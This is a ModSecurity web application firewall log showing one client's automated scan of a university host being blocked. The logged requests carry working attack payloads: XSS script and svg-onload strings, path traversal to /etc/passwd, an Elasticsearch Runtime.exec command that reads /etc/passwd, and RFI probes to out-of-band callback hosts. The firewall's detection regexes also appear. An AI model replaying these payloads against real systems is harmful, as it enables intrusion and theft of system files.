[Tue Aug 29 11:56:50.691617 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAqsWC8AAAAB"]
[Tue Aug 29 11:56:51.750871 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "mbkm.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAArZP3UAAAAC"]
[Tue Aug 29 11:56:52.764100 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAArIAbsAAAAX"]
[Tue Aug 29 11:56:52.798869 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAoz8QYAAAAS"]
[Tue Aug 29 11:56:54.623515 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAqqtn8AAAAA"]
[Tue Aug 29 11:56:56.248142 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAq-HjsAAAAT"]
[Tue Aug 29 11:56:57.739246 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAoz8TsAAAAS"]
[Tue Aug 29 11:56:59.652730 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8VcAAAAS"]
[Tue Aug 29 11:57:00.599937 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAAq-Hl0AAAAT"]
[Tue Aug 29 11:57:01.554272 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAnEqVYAAAAO"]
[Tue Aug 29 11:57:01.611306 2023] [:error] [pid 2780] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAArcTMYAAAAH"]
[Tue Aug 29 11:57:02.744063 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq5@bsAAAAK"]
[Tue Aug 29 11:57:05.704852 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAq-HpUAAAAT"]
[Tue Aug 29 11:57:07.632084 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArbWUcAAAAG"]
[Tue Aug 29 11:57:07.664592 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAnEqXcAAAAO"]
[Tue Aug 29 11:57:08.671633 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAArbWVEAAAAG"]
[Tue Aug 29 11:57:08.848733 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArbWVgAAAAG"]
[Tue Aug 29 11:57:11.573870 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAoz8bIAAAAS"]
[Tue Aug 29 11:57:12.261012 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAnEqaEAAAAO"]
[Tue Aug 29 11:57:18.593756 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAoz8c8AAAAS"]
[Tue Aug 29 11:57:18.713027 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0ct8xixr1huem4.oast.site found within TX:1: cjmnijtjmimvgniikdb0ct8xixr1huem4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAArbWYgAAAAG"]
[Tue Aug 29 11:57:19.546443 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAArePHQAAAAJ"]
[Tue Aug 29 11:57:23.546302 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAnEqdYAAAAO"]
[Tue Aug 29 11:57:25.963888 2023] [:error] [pid 2784] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tcCo-f0AAArgDv0AAAAE"]
[Tue Aug 29 11:57:26.136896 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAqsWEEAAAAB"]
